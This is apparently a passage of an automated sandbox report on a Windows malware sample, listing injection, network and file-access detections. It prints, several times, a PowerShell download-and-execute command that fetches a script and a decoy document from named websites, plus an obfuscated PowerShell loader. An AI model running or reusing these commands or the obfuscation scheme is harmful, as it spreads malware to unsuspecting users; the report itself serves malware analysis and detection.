                        Source: powershell.exe, 00000001.00000002.3150059195.00000295EFE2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1994677215.000001D2AC092000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04A28F99 LdrInitializeThunk,11_2_04A28F99
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00350283 mov eax, dword ptr fs:[00000030h]20_3_00350283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7968.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3CD0000Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'c:\users\public\k9o5xs1hnem9ja8a.vbs';downloadandrun -url 'https://www.ftsengineers.com/lm/list%20of%20required%20items%20and%20services.doc' -destination 'c:\users\public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$realitetsbehandler='clairsentient';;$opdragerfunktion='nikau';;$amontilladoer='brucellosis';;$skuldret='picker74';;$supercanonisation=$host.name; function kommaernes($outbidder){if ($supercanonisation) {$nedblndedes='medbringe';$brions=2;$oakling=$brions}do{$stratigrapher+=$outbidder[$oakling];$oakling+=3} until(!$outbidder[$oakling])$stratigrapher}function satsstatistikken($vridning150){ .($misscribed) ($vridning150)}$spitefullest=kommaernes ' yn debyt.h. vw';$spitefullest+=kommaernes 'abepebu.cdilpii eed.n,vt';$gedeskindene=kommaernes ',nmj op zu ia lcllcoa ./';$amatren=kommaernes ' attrl isin1 c2';$oaklingnddragelses='sr[ fn.nechtde. bs desyr.vvarikncunenup toe ibanb.t,umrea unc aphge eprrn ]bo:a : hs oefocgluherm i tt,yt p,kra,oslt koo c ro flga= i$ ca mgra dt mr rem n';$gedeskindene+=kommaernes 'a 5,e.ov0 f(c wh,ibenopdglo w ss, gdns tch s 1kw0py. r0es;fu rewbyid nfa6f,4fl;o vaxsk6 w4ou;ot or ovs : .1s 3fn1sy.f 0gr)pu fgbredecp kbioly/fa2 c0cu1be0mo0ko1fe0bl1 , fef oi,er ie afbkoa xch/bi1 i3se1.a.be0';$enkemnds=kommaernes ',uusts ee ,rac-boastg fe ,ntat';$multilobulate=kommaernes 'knh,utcots p csci: / /glw.sw,owd .f ta,d.eeh jwab b.stcmeoaamfr/ nk ipox/rera etai aseusfou,ne arpr. gxn.s an b> ahpit bthup sd :mo/ex/ w,ywt,wta.urf dtm sshe snsog,oi lnceek,e.yrm.sin.lacsko mmsk/djkfam d/taromep.i sb s eu hepur o. ,xsus un';$tunneling=kommaernes 'fo>';$misscribed=kommaernes 'k,i xeglx';$allieres24='dalsnkning';$medicates='\dyrehospitalerne.gra';satsstatistikken (kommaernes ' f$isgdrl o eb ua.alfa:tre .vdeains tiopoimnleea.rins c=re$eyef.n nvt,:.aagapunp adsla ft a ,+ o$ mbee dsti ic ha ktkoegys');satsstatistikken (kommaernes 'in$.igkolvaoovbunaswlor: riinnstujanmacnithou voblu sssa= m$slmbeu plglt pi rliloloblrum,l aafot zear.udsflpcrl fi lt a(ja$c,timubona,nk,enel eiexningo,)');satsstatistikken (kommaernes $oaklingnddragelses);$multilobulate=$inunctuous[0];$pressurized=(kommaernes 'ci$tigpolisotibu.adrlf :fod oefofp rb o tc k =s ns,egiwmu-cyowhbryj earc otdy afssvysps ht geovm k. b$reslepunisytboe kf eufrlfal ewis ,t');satsstatistikken ($pressurized);satsstatistikken (kommaernes 'de$swd eunfpar fof c.rkh,. rhule ianad aeprrs,sdg[tr$.aef ntrksue sm tnmud sun]s,=fo$l gste.edkve s uksci antadmae lnsee');$stoikerne=kommaernes 's,$sod ledyfi rneo .ccakfa.vadbropaw anfrllaofoa tdc f ri,olbiedo(c $damtuu kl lt oi ol aoo b iu ml nauotbieer,.a$ ,h vnoi,xr,iv,ue plsubd,e fvsng heenls seneilr,esph)';$hvirvelbevgelsers=$evasioners;satsstatistikken (kommaernes ' o$ vgallanon.b fagal b: sh uuansbaee,rkoeradbre espr= f(udtf.e ,sretsi-dip avitg hsk pr$ nhhivwaiprr.ovdee,jl b cesivnogfoefllsvsjoe,crspssk)');while (!$huseredes) {satsstatistikken (kommaernes 'uk$ jgaklpeolabodai lev:yah laa,lhusekh umagfygske a=te$remu.ia,sdyt dnrek pt') ;satsstatistikken $stoikerne;satsstatistikken (kommaernes 'des .tmaadrrskt s- r
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$realitetsbehandler='clairsentient';;$opdragerfunktion='nikau';;$amontilladoer='brucellosis';;$skuldret='picker74';;$supercanonisation=$host.name; function kommaernes($outbidder){if ($supercanonisation) {$nedblndedes='medbringe';$brions=2;$oakling=$brions}do{$stratigrapher+=$outbidder[$oakling];$oakling+=3} until(!$outbidder[$oakling])$stratigrapher}function satsstatistikken($vridning150){ .($misscribed) ($vridning150)}$spitefullest=kommaernes ' yn debyt.h. vw';$spitefullest+=kommaernes 'abepebu.cdilpii eed.n,vt';$gedeskindene=kommaernes ',nmj op zu ia lcllcoa ./';$amatren=kommaernes ' attrl isin1 c2';$oaklingnddragelses='sr[ fn.nechtde. bs desyr.vvarikncunenup toe ibanb.t,umrea unc aphge eprrn ]bo:a : hs oefocgluherm i tt,yt p,kra,oslt koo c ro flga= i$ ca mgra dt mr rem n';$gedeskindene+=kommaernes 'a 5,e.ov0 f(c wh,ibenopdglo w ss, gdns tch s 1kw0py. r0es;fu rewbyid nfa6f,4fl;o vaxsk6 w4ou;ot or ovs : .1s 3fn1sy.f 0gr)pu fgbredecp kbioly/fa2 c0cu1be0mo0ko1fe0bl1 , fef oi,er ie afbkoa xch/bi1 i3se1.a.be0';$enkemnds=kommaernes ',uusts ee ,rac-boastg fe ,ntat';$multilobulate=kommaernes 'knh,utcots p csci: / /glw.sw,owd .f ta,d.eeh jwab b.stcmeoaamfr/ nk ipox/rera etai aseusfou,ne arpr. gxn.s an b> ahpit bthup sd :mo/ex/ w,ywt,wta.urf dtm sshe snsog,oi lnceek,e.yrm.sin.lacsko mmsk/djkfam d/taromep.i sb s eu hepur o. ,xsus un';$tunneling=kommaernes 'fo>';$misscribed=kommaernes 'k,i xeglx';$allieres24='dalsnkning';$medicates='\dyrehospitalerne.gra';satsstatistikken (kommaernes ' f$isgdrl o eb ua.alfa:tre .vdeains tiopoimnleea.rins c=re$eyef.n nvt,:.aagapunp adsla ft a ,+ o$ mbee dsti ic ha ktkoegys');satsstatistikken (kommaernes 'in$.igkolvaoovbunaswlor: riinnstujanmacnithou voblu sssa= m$slmbeu plglt pi rliloloblrum,l aafot zear.udsflpcrl fi lt a(ja$c,timubona,nk,enel eiexningo,)');satsstatistikken (kommaernes $oaklingnddragelses);$multilobulate=$inunctuous[0];$pressurized=(kommaernes 'ci$tigpolisotibu.adrlf :fod oefofp rb o tc k =s ns,egiwmu-cyowhbryj earc otdy afssvysps ht geovm k. b$reslepunisytboe kf eufrlfal ewis ,t');satsstatistikken ($pressurized);satsstatistikken (kommaernes 'de$swd eunfpar fof c.rkh,. rhule ianad aeprrs,sdg[tr$.aef ntrksue sm tnmud sun]s,=fo$l gste.edkve s uksci antadmae lnsee');$stoikerne=kommaernes 's,$sod ledyfi rneo .ccakfa.vadbropaw anfrllaofoa tdc f ri,olbiedo(c $damtuu kl lt oi ol aoo b iu ml nauotbieer,.a$ ,h vnoi,xr,iv,ue plsubd,e fvsng heenls seneilr,esph)';$hvirvelbevgelsers=$evasioners;satsstatistikken (kommaernes ' o$ vgallanon.b fagal b: sh uuansbaee,rkoeradbre espr= f(udtf.e ,sretsi-dip avitg hsk pr$ nhhivwaiprr.ovdee,jl b cesivnogfoefllsvsjoe,crspssk)');while (!$huseredes) {satsstatistikken (kommaernes 'uk$ jgaklpeolabodai lev:yah laa,lhusekh umagfygske a=te$remu.ia,sdyt dnrek pt') ;satsstatistikken $stoikerne;satsstatistikken (kommaernes 'des .tmaadrrskt s- r
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'c:\users\public\k9o5xs1hnem9ja8a.vbs';downloadandrun -url 'https://www.ftsengineers.com/lm/list%20of%20required%20items%20and%20services.doc' -destination 'c:\users\public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$realitetsbehandler='clairsentient';;$opdragerfunktion='nikau';;$amontilladoer='brucellosis';;$skuldret='picker74';;$supercanonisation=$host.name; function kommaernes($outbidder){if ($supercanonisation) {$nedblndedes='medbringe';$brions=2;$oakling=$brions}do{$stratigrapher+=$outbidder[$oakling];$oakling+=3} until(!$outbidder[$oakling])$stratigrapher}function satsstatistikken($vridning150){ .($misscribed) ($vridning150)}$spitefullest=kommaernes ' yn debyt.h. vw';$spitefullest+=kommaernes 'abepebu.cdilpii eed.n,vt';$gedeskindene=kommaernes ',nmj op zu ia lcllcoa ./';$amatren=kommaernes ' attrl isin1 c2';$oaklingnddragelses='sr[ fn.nechtde. bs desyr.vvarikncunenup toe ibanb.t,umrea unc aphge eprrn ]bo:a : hs oefocgluherm i tt,yt p,kra,oslt koo c ro flga= i$ ca mgra dt mr rem n';$gedeskindene+=kommaernes 'a 5,e.ov0 f(c wh,ibenopdglo w ss, gdns tch s 1kw0py. r0es;fu rewbyid nfa6f,4fl;o vaxsk6 w4ou;ot or ovs : .1s 3fn1sy.f 0gr)pu fgbredecp kbioly/fa2 c0cu1be0mo0ko1fe0bl1 , fef oi,er ie afbkoa xch/bi1 i3se1.a.be0';$enkemnds=kommaernes ',uusts ee ,rac-boastg fe ,ntat';$multilobulate=kommaernes 'knh,utcots p csci: / /glw.sw,owd .f ta,d.eeh jwab b.stcmeoaamfr/ nk ipox/rera etai aseusfou,ne arpr. gxn.s an b> ahpit bthup sd :mo/ex/ w,ywt,wta.urf dtm sshe snsog,oi lnceek,e.yrm.sin.lacsko mmsk/djkfam d/taromep.i sb s eu hepur o. ,xsus un';$tunneling=kommaernes 'fo>';$misscribed=kommaernes 'k,i xeglx';$allieres24='dalsnkning';$medicates='\dyrehospitalerne.gra';satsstatistikken (kommaernes ' f$isgdrl o eb ua.alfa:tre .vdeains tiopoimnleea.rins c=re$eyef.n nvt,:.aagapunp adsla ft a ,+ o$ mbee dsti ic ha ktkoegys');satsstatistikken (kommaernes 'in$.igkolvaoovbunaswlor: riinnstujanmacnithou voblu sssa= m$slmbeu plglt pi rliloloblrum,l aafot zear.udsflpcrl fi lt a(ja$c,timubona,nk,enel eiexningo,)');satsstatistikken (kommaernes $oaklingnddragelses);$multilobulate=$inunctuous[0];$pressurized=(kommaernes 'ci$tigpolisotibu.adrlf :fod oefofp rb o tc k =s ns,egiwmu-cyowhbryj earc otdy afssvysps ht geovm k. b$reslepunisytboe kf eufrlfal ewis ,t');satsstatistikken ($pressurized);satsstatistikken (kommaernes 'de$swd eunfpar fof c.rkh,. rhule ianad aeprrs,sdg[tr$.aef ntrksue sm tnmud sun]s,=fo$l gste.edkve s uksci antadmae lnsee');$stoikerne=kommaernes 's,$sod ledyfi rneo .ccakfa.vadbropaw anfrllaofoa tdc f ri,olbiedo(c $damtuu kl lt oi ol aoo b iu ml nauotbieer,.a$ ,h vnoi,xr,iv,ue plsubd,e fvsng heenls seneilr,esph)';$hvirvelbevgelsers=$evasioners;satsstatistikken (kommaernes ' o$ vgallanon.b fagal b: sh uuansbaee,rkoeradbre espr= f(udtf.e ,sretsi-dip avitg hsk pr$ nhhivwaiprr.ovdee,jl b cesivnogfoefllsvsjoe,crspssk)');while (!$huseredes) {satsstatistikken (kommaernes 'uk$ jgaklpeolabodai lev:yah laa,lhusekh umagfygske a=te$remu.ia,sdyt dnrek pt') ;satsstatistikken $stoikerne;satsstatistikken (kommaernes 'des .tmaadrrskt s- rJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
